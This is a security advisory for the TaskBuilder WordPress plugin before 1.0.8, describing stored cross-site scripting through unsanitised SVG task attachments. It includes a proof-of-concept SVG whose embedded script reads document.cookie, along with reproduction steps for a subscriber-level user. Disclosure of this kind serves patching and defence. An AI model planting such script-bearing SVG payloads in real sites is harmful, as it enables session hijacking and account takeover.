wpexploit | Rizacan Tufan | WPEX-ID:524928D6-D4E9-4A2F-B410-46958DA549D8
Sep 15, 2022 - 12:00 a.m.

TaskBuilder < 1.0.8 - Subscriber+ Stored XSS via SVG file upload


EPSS: 0.001 (percentile: 24.8%)

The plugin does not validate or sanitise task attachments, which could allow any authenticated user (such as a subscriber) who creates a task to perform Stored Cross-Site Scripting by attaching a malicious SVG file.

Create an SVG with the following content:

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>

As any authenticated user, such as subscriber:
- Go to http://vuln.local/wp-admin/admin.php?page=wppm-tasks
- Choose any task (create one if there aren't any)
- Focus on "Write a comment".
- Click on "Attach Files" and select the SVG created above
- Click on "Send".
- View the attached SVG by clicking on its URL (https://example.com/?wppm_attachment=86&tid=1&tac=OtjI9JpnQU), which will trigger the XSS
